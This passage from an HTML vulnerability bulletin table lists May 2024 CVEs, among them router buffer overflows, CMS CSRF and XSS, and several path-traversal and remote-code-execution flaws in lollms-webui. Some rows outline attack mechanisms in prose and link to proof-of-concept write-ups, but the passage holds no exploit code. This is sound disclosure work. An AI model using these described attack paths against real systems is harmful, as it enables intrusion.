<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34338" target="_blank">CVE-2024-34338</a><br><a href="http://exzettabyte.me/blind-command-injection-in-tenda-o3v2" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in xmllint (from libxml2) before 2.11.8 and 2.12.x before 2.12.7. Formatting error messages with xmllint --htmlout can result in a buffer over-read in xmlHTMLPrintFileContext in xmllint.c.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34459" target="_blank">CVE-2024-34459</a><br><a href="https://gitlab.gnome.org/GNOME/libxml2/-/issues/720" target="_blank">cve@mitre.org</a><br><a href="https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.11.8" target="_blank">cve@mitre.org</a><br><a href="https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.12.7" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Sunhillo SureLine through 8.10.0 on RICI 5000 devices allows cgi/usrPasswd.cgi userid_change XSS within the Forgot Password feature.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34582" target="_blank">CVE-2024-34582</a><br><a href="https://github.com/silent6trinity/CVE-2024-34582" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>WWBN AVideo 12.4 is vulnerable to Cross Site Scripting (XSS).</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34899" target="_blank">CVE-2024-34899</a><br><a href="https://hackerdna.com/courses/cve/cve-2024-34899" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>FlyFish v3.0.0 was discovered to contain a buffer overflow via the password parameter on the login page. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34905" target="_blank">CVE-2024-34905</a><br><a href="https://github.com/CloudWise-OpenSource/FlyFish/issues/191" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An arbitrary file upload vulnerability in dootask v0.30.13 allows attackers to execute arbitrary code via uploading a crafted PDF file.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34906" target="_blank">CVE-2024-34906</a><br><a href="https://github.com/kuaifan/dootask/issues/210" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An arbitrary file upload vulnerability in KYKMS v1.0.1 and below allows attackers to execute arbitrary code via uploading a crafted PDF file.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34909" target="_blank">CVE-2024-34909</a><br><a href="https://github.com/Joying-C/Cross-site-scripting-vulnerability/tree/main/KYKMS_Cross_site%20_scripting%20_vulnerability" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An arbitrary file upload vulnerability in r-pan-scaffolding v5.0 and below allows attackers to execute arbitrary code via uploading a crafted PDF file.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34913" target="_blank">CVE-2024-34913</a><br><a href="https://github.com/Joying-C/Cross-site-scripting-vulnerability/tree/main/r-pan-scaffolding_Cross_site%20_scripting%20_vulnerability" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>php-censor v2.1.4 and fixed in v.2.1.5 was discovered to utilize a weak hashing algorithm for its remember_key value. This allows attackers to bruteforce to bruteforce the remember_key value to gain access to accounts that have checked "remember me" when logging in.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34914" target="_blank">CVE-2024-34914</a><br><a href="https://chmod744.super.site/redacted-vulnerability" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An arbitrary file upload vulnerability in the component \modstudent\controller.php of Pisay Online E-Learning System using PHP/MySQL v1.0 allows attackers to execute arbitrary code via uploading a crafted file.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34919" target="_blank">CVE-2024-34919</a><br><a href="https://github.com/CveSecLook/cve/issues/20" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK X5000R v9.1.0cu.2350_B20230313 was discovered to contain a command injection via the disconnectVPN function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34921" target="_blank">CVE-2024-34921</a><br><a href="https://github.com/cainiao159357/x5000r_poc/blob/main/README.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the funcpara1 parameter at ip/goform/exeCommand.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34942" target="_blank">CVE-2024-34942</a><br><a href="https://palm-vertebra-fe9.notion.site/formexeCommand-200db77a90d34c708b903c935c7c65c0" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the page parameter at ip/goform/NatStaticSetting.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34943" target="_blank">CVE-2024-34943</a><br><a href="https://palm-vertebra-fe9.notion.site/fromNatStaticSetting-fae26e1bfbe64b49a46230a629b6d198" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the list1 parameter at ip/goform/DhcpListClient.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34944" target="_blank">CVE-2024-34944</a><br><a href="https://www.tendacn.com/hk/download/detail-2344.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the PPW parameter at ip/goform/WizardHandle.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34945" target="_blank">CVE-2024-34945</a><br><a href="https://palm-vertebra-fe9.notion.site/fromWizardHandle-98e188c072984620a907ea5df0d80ad5" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the page parameter at ip/goform/DhcpListClient.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34946" target="_blank">CVE-2024-34946</a><br><a href="https://palm-vertebra-fe9.notion.site/fromDhcpListClient_page-c9ee71f670534555a5ef2d99320da48e" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>D-Link DIR-822+ v1.0.5 was discovered to contain a stack-based buffer overflow vulnerability in the SetNetworkTomographySettings module.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34950" target="_blank">CVE-2024-34950</a><br><a href="https://dear-sunshine-ba5.notion.site/D-Link-DIR-822-v1-0-5-Stack-Overflow-e77ff3d9c31f4a98bfa0fa71eca54000" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Code-projects Budget Management 1.0 is vulnerable to Cross Site Scripting (XSS) via the budget parameter.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34954" target="_blank">CVE-2024-34954</a><br><a href="https://github.com/ethicalhackerNL/CVEs/blob/main/Budget%20Management/XSS/XSS.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Code-projects Budget Management 1.0 is vulnerable to SQL Injection via the delete parameter.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34955" target="_blank">CVE-2024-34955</a><br><a href="https://github.com/ethicalhackerNL/CVEs/blob/main/Budget%20Management/SQLi.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/sysImages_deal.php?mudi=infoSet.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34957" target="_blank">CVE-2024-34957</a><br><a href="https://github.com/Gr-1m/cms/blob/main/1.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/banner_deal.php?mudi=add</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34958" target="_blank">CVE-2024-34958</a><br><a href="https://github.com/Gr-1m/cms/blob/main/2.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>DedeCMS V5.7.113 is vulnerable to Cross Site Scripting (XSS) via sys_data_replace.php.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34959" target="_blank">CVE-2024-34959</a><br><a href="https://gitee.com/upgogo/s123/issues/I9MARO" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Tenda AC18 v15.03.05.19 is vulnerable to Buffer Overflow in the formSetPPTPServer function via the endIp parameter.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34974" target="_blank">CVE-2024-34974</a><br><a href="https://github.com/hunzi0/Vullnfo/tree/main/Tenda/AC18/formSetPPTPServer" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34982" target="_blank">CVE-2024-34982</a><br><a href="https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>joblib v1.4.2 was discovered to contain a deserialization vulnerability via the component joblib.numpy_pickle::NumpyArrayWrapper().read_array().</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34997" target="_blank">CVE-2024-34997</a><br><a href="https://github.com/joblib/joblib/issues/1582" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/share_switch.php?mudi=switch&amp;dataType=&amp;fieldName=state&amp;fieldName2=state&amp;tabName=banner&amp;dataID=6.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35009" target="_blank">CVE-2024-35009</a><br><a href="https://github.com/Thirtypenny77/cms/blob/main/5.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/banner_deal.php?mudi=del&amp;dataType=&amp;dataTypeCN=%E5%9B%BE%E7%89%87%E5%B9%BF%E5%91%8A&amp;theme=cs&amp;dataID=6.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35010" target="_blank">CVE-2024-35010</a><br><a href="https://github.com/Thirtypenny77/cms/blob/main/6.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/infoType_deal.php?mudi=rev&amp;nohrefStr=close.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35011" target="_blank">CVE-2024-35011</a><br><a href="https://github.com/Thirtypenny77/cms/blob/main/8.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/infoType_deal.php?mudi=add&amp;nohrefStr=close.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35012" target="_blank">CVE-2024-35012</a><br><a href="https://github.com/Thirtypenny77/cms/blob/main/7.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via admin/tplSys_deal.php?mudi=area.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35039" target="_blank">CVE-2024-35039</a><br><a href="https://github.com/ywf7678/cms/blob/main/1.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue in SurveyKing v1.3.1 allows attackers to execute a session replay attack after a user changes their password.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35048" target="_blank">CVE-2024-35048</a><br><a href="https://github.com/javahuang/SurveyKing/issues/56" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>SurveyKing v1.3.1 was discovered to keep users' sessions active after logout. Related to an incomplete fix for CVE-2022-25590.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35049" target="_blank">CVE-2024-35049</a><br><a href="https://github.com/javahuang/SurveyKing/issues/55" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue in SurveyKing v1.3.1 allows attackers to escalate privileges via re-using the session ID of a user that was deleted by an Admin.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35050" target="_blank">CVE-2024-35050</a><br><a href="https://github.com/javahuang/SurveyKing/issues/57" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK LR350 V9.3.5u.6698_B20230810 was discovered to contain a stack overflow via the password parameter in the function loginAuth.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35099" target="_blank">CVE-2024-35099</a><br><a href="https://github.com/s4ndw1ch136/IOT-vuln-reports/blob/main/V9.3.5u.6698_B20230810/README.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Insecure Permissions vulnerability in VITEC AvediaServer (Model avsrv-m8105) 8.6.2-1 allows a remote attacker to escalate privileges via a crafted script.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35102" target="_blank">CVE-2024-35102</a><br><a href="https://vuln2you.blogspot.com/2024/05/avediaserver-unauthorised-api-access.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/homePro_deal.php?mudi=del&amp;dataType=&amp;dataTypeCN.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35108" target="_blank">CVE-2024-35108</a><br><a href="https://github.com/FirstLIF/cms/blob/main/1.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /homePro_deal.php?mudi=add&amp;nohrefStr=close.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35109" target="_blank">CVE-2024-35109</a><br><a href="https://github.com/FirstLIF/cms/blob/main/2.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A reflected XSS vulnerability has been found in YzmCMS 7.1. The vulnerability exists in yzmphp/core/class/application.class.php: when logged-in users access a malicious link, their cookies can be captured by an attacker.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35110" target="_blank">CVE-2024-35110</a><br><a href="https://github.com/yzmcms/yzmcms/issues/68" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Veritas System Recovery before 23.2_Hotfix has incorrect permissions for the Veritas System Recovery folder, and thus low-privileged users can conduct attacks.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35204" target="_blank">CVE-2024-35204</a><br><a href="https://www.veritas.com/content/support/en_US/article.100065391" target="_blank">cve@mitre.org</a><br><a href="https://www.veritas.com/support/en_US/security/VTS24-005" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>The WPS Office (aka cn.wps.moffice_eng) application before 17.0.0 for Android fails to properly sanitize file names before processing them through external application interactions, leading to a form of path traversal. This potentially enables any application to dispatch a crafted library file, aiming to overwrite an existing native library utilized by WPS Office. Successful exploitation could result in the execution of arbitrary commands under the guise of WPS Office's application ID.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35205" target="_blank">CVE-2024-35205</a><br><a href="https://www.microsoft.com/en-us/security/blog/2024/05/01/dirty-stream-attack-discovering-and-mitigating-a-common-vulnerability-pattern-in-android-apps/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>In Tor Arti before 1.2.3, STUB circuits incorrectly have a length of 2 (with lite vanguards), aka TROVE-2024-003.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35312" target="_blank">CVE-2024-35312</a><br><a href="https://gitlab.torproject.org/tpo/core/arti/-/issues/1409" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>In Tor Arti before 1.2.3, circuits sometimes incorrectly have a length of 3 (with full vanguards), aka TROVE-2024-004.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35313" target="_blank">CVE-2024-35313</a><br><a href="https://gitlab.torproject.org/tpo/core/arti/-/issues/1400" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>question_image.ts in SurveyJS Form Library before 1.10.4 allows contentMode=youtube XSS via the imageLink property.</td>
<td>2024-05-18</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-36043" target="_blank">CVE-2024-36043</a><br><a href="https://github.com/surveyjs/survey-library/commit/b25fbf0efd4486dc55f836240bebc2305803b96d" target="_blank">cve@mitre.org</a><br><a href="https://github.com/surveyjs/survey-library/issues/8286" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>QAbstractOAuth in Qt Network Authorization in Qt before 5.15.17, 6.x before 6.2.13, 6.3.x through 6.5.x before 6.5.6, and 6.6.x through 6.7.x before 6.7.1 uses only the time to seed the PRNG, which may result in guessable values.</td>
<td>2024-05-18</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-36048" target="_blank">CVE-2024-36048</a><br><a href="https://codereview.qt-project.org/c/qt/qtnetworkauth/+/560317" target="_blank">cve@mitre.org</a><br><a href="https://codereview.qt-project.org/c/qt/qtnetworkauth/+/560368" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Nix through 2.22.1 mishandles certain usage of hash caches, which makes it easier for attackers to replace current source code with attacker-controlled source code by luring a maintainer into accepting a malicious pull request.</td>
<td>2024-05-18</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-36050" target="_blank">CVE-2024-36050</a><br><a href="https://github.com/NixOS/nix/issues/969" target="_blank">cve@mitre.org</a><br><a href="https://github.com/NixOS/ofborg/issues/68#issuecomment-2082789441" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>parisneo--parisneo/lollms-webui<br> </td>
<td>A stored Cross-Site Scripting (XSS) vulnerability exists in the parisneo/lollms-webui application due to improper validation of uploaded files in the profile picture upload functionality. Attackers can exploit this vulnerability by uploading malicious HTML files containing JavaScript code, which is executed when the file is accessed. This vulnerability is remotely exploitable via Cross-Site Request Forgery (CSRF), allowing attackers to perform actions on behalf of authenticated users and potentially leading to unauthorized access to sensitive information within the Lollms-webui application.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2299" target="_blank">CVE-2024-2299</a><br><a href="https://huntr.com/bounties/f1adaac0-b9ed-4093-a0f3-2d0a4ecba398" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>parisneo--parisneo/lollms-webui<br> </td>
<td>A path traversal vulnerability in the '/apply_settings' endpoint of parisneo/lollms-webui allows attackers to execute arbitrary code. The vulnerability arises due to insufficient sanitization of user-supplied input in the configuration settings, specifically within the 'extensions' parameter. Attackers can exploit this by crafting a payload that includes relative path traversal sequences ('../../../'), enabling them to navigate to arbitrary directories. This flaw subsequently allows the server to load and execute a malicious '__init__.py' file, leading to remote code execution. The issue affects the latest version of parisneo/lollms-webui.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2358" target="_blank">CVE-2024-2358</a><br><a href="https://huntr.com/bounties/b2771df3-be50-45bd-93c4-0974ce38bc22" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>parisneo--parisneo/lollms-webui<br> </td>
<td>A vulnerability in the parisneo/lollms-webui allows for arbitrary file upload and read due to insufficient sanitization of user-supplied input. Specifically, the issue resides in the `install_model()` function within `lollms_core/lollms/binding.py`, where the application fails to properly sanitize the `file://` protocol and other inputs, leading to arbitrary read and upload capabilities. Attackers can exploit this vulnerability by manipulating the `path` and `variant_name` parameters to achieve path traversal, allowing for the reading of arbitrary files and uploading files to arbitrary locations on the server. This vulnerability affects the latest version of parisneo/lollms-webui.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2361" target="_blank">CVE-2024-2361</a><br><a href="https://huntr.com/bounties/cd383817-924a-445a-838e-d0c867c6a176" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>parisneo--parisneo/lollms-webui<br> </td>
<td>A remote code execution vulnerability exists in the parisneo/lollms-webui application, specifically within the reinstall_binding functionality in lollms_core/lollms/server/endpoints/lollms_binding_infos.py of the latest version. The vulnerability arises due to insufficient path sanitization, allowing an attacker to exploit path traversal to navigate to arbitrary directories. By manipulating the binding_path to point to a controlled directory and uploading a malicious __init__.py file, an attacker can execute arbitrary code on the server.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2366" target="_blank">CVE-2024-2366</a><br><a href="https://huntr.com/bounties/63266c77-408b-45ff-962c-8163db50a864" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>parisneo--parisneo/lollms-webui<br> </td>
<td>A command injection vulnerability exists in the 'run_xtts_api_server' function of the parisneo/lollms-webui application, specifically within the 'lollms_xtts.py' script. The vulnerability arises due to the improper neutralization of special elements used in an OS command. The affected function utilizes 'subprocess.Popen' to execute a command constructed with a Python f-string, without adequately sanitizing the 'xtts_base_url' input. This flaw allows attackers to execute arbitrary commands remotely by manipulating the 'xtts_base_url' parameter. The vulnerability affects versions up to and including the latest version before 9.5. Successful exploitation could lead to arbitrary remote code execution (RCE) on the system where the application is deployed.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3126" target="_blank">CVE-2024-3126</a><br><a href="https://github.com/parisneo/lollms-webui/commit/41dbb1b3f2e78ea276e5269544e50514252c0c25" target="_blank">security@huntr.dev</a><br><a href="https://huntr.com/bounties/0e2bec70-826e-4c24-8015-31921e23fd12" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>parisneo--parisneo/lollms-webui<br> </td>
<td>A path traversal vulnerability exists in the 'save_settings' endpoint of the parisneo/lollms-webui application, affecting versions up to the latest release before 9.5. The vulnerability arises due to insufficient sanitization of the 'config' parameter in the 'apply_settings' function, allowing an attacker to manipulate the application's configuration by sending specially crafted JSON payloads. This could lead to remote code execution (RCE) by bypassing existing patches designed to mitigate such vulnerabilities.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3435" target="_blank">CVE-2024-3435</a><br><a href="https://github.com/parisneo/lollms-webui/commit/bb99b59e710d00c4f2598faa5e183fa30fbd3bc2" target="_blank">security@huntr.dev</a><br><a href="https://huntr.com/bounties/494f349a-8650-4d30-a0bd-4742fda44ce5" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>parisneo--parisneo/lollms-webui<br> </td>
<td>A path traversal vulnerability exists in the parisneo/lollms-webui application, specifically within the `/list_personalities` endpoint. By manipulating the `category` parameter, an attacker can traverse the directory structure and list any directory on the system. This issue affects the latest version of the application. The vulnerability is due to improper handling of user-supplied input in the `list_personalities` function, where the `category` parameter can be controlled to specify arbitrary directories for listing. Successful exploitation of this vulnerability could allow an attacker to list all folders in the drive on the system, potentially leading to information disclosure.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4322" target="_blank">CVE-2024-4322</a><br><a href="https://huntr.com/bounties/5116d858-ce00-418c-a5a5-851c5608c209" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>parisneo--parisneo/lollms-webui<br> </td>
<td>A vulnerability in parisneo/lollms-webui versions up to 9.3 allows remote attackers to execute arbitrary code. The vulnerability stems from insufficient protection of the `/apply_settings` and `/execute_code` endpoints. Attackers can bypass protections by setting the host to localhost, enabling code execution, and disabling code validation through the `/apply_settings` endpoint. Subsequently, arbitrary commands can be executed remotely via the `/execute_code` endpoint, exploiting the delay in settings enforcement. This issue was addressed in version 9.5.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4326" target="_blank">CVE-2024-4326</a><br><a href="https://github.com/parisneo/lollms-webui/commit/abb4c6d495a95a3ef5b114ffc57f85cd650b905e" target="_blank">security@huntr.dev</a><br><a href="https://huntr.com/bounties/2ab9f03d-0538-4317-be21-0748a079cbdd" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>parisneo--parisneo/lollms<br> </td>
<td>A vulnerability in the parisneo/lollms, specifically in the `/unInstall_binding` endpoint, allows for arbitrary code execution due to insufficient sanitization of user input. The issue arises from the lack of path sanitization when handling the `name` parameter in the `unInstall_binding` function, allowing an attacker to traverse directories and execute arbitrary code by loading a malicious `__init__.py` file. This vulnerability affects the latest version of the software. The exploitation of this vulnerability could lead to remote code execution on the system where parisneo/lollms is deployed.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4078" target="_blank">CVE-2024-4078</a><br><a href="https://github.com/parisneo/lollms/commit/7ebe08da7e0026b155af4f7be1d6417bc64cf02f" target="_blank">security@huntr.dev</a><br><a href="https://huntr.com/bounties/a55a8c04-df44-49b2-bcfa-2a2b728a299d" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>run-llama--run-llama/llama_index<br> </td>
